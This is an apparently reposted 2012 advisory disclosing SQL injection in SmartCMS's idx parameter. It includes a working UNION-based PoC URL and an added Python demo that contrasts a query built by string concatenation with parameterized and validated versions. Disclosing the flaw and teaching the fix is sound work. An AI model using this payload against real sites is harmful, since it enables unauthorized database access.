SmartCMS <= SQL Injection Vulnerability

Published : 2012.11.26
Credit : NoGe
Risk : Medium
CWE : CWE-89
CVE : N/A
Local : No
Remote : Yes

===========================================

[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartCMS
Vendor : http://smartcms.nl/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

===========================================

[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
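
The fix for this class of bug (CWE-89), as an added example that is not SmartCMS code and not part of the original advisory: the same idx value handled by string concatenation, by a bound parameter, and by strict integer validation. It assumes a one-column lookup; the SQLite in-memory database, the pages table, the function names and the registered version() stand-in are all constructed for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string of the PoC request shown above.
POC_QUERY = "idx=123+AND+1=2+UNION+ALL+SELECT+version()--"

def make_db():
    """Constructed stand-in database; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO pages VALUES (123, 'Home')")
    # SQLite has no version(); register a constructed one so the UNION branch
    # resolves as it would on a server that provides that function.
    conn.create_function("version", 0, lambda: "constructed-version-string")
    return conn

def lookup_vulnerable(conn, idx):
    # CWE-89 pattern: the parameter is concatenated into the SQL text, so
    # everything after the number is parsed as SQL.
    return conn.execute("SELECT title FROM pages WHERE id = " + idx).fetchall()

def lookup_parameterized(conn, idx):
    # The value is bound as data and cannot change the statement's shape.
    return conn.execute("SELECT title FROM pages WHERE id = ?", (idx,)).fetchall()

def lookup_strict(conn, idx):
    # Defence in depth: idx is a numeric identifier, so reject anything else
    # before it reaches the database layer.
    if not (idx.isascii() and idx.isdigit()):
        raise ValueError("idx must be a decimal integer")
    return lookup_parameterized(conn, int(idx))

def demo():
    conn = make_db()
    payload = parse_qs(POC_QUERY)["idx"][0]  # URL-decoded idx value
    try:
        strict = lookup_strict(conn, payload)
    except ValueError:
        strict = "rejected"
    return {
        "vulnerable": lookup_vulnerable(conn, payload),
        "parameterized": lookup_parameterized(conn, payload),
        "strict": strict,
        "legit": lookup_strict(conn, "123"),
    }

if __name__ == "__main__":
    print(demo())
```
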

===========================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{

===========================================

[o] November 26 2012 - Papua, Indonesia

References:

http://smartcms.nl/
http://evilc0de.blogspot.com/
http://cxsecurity.com/issue/WLB-2011080175


Copyright 2017, cxsecurity.com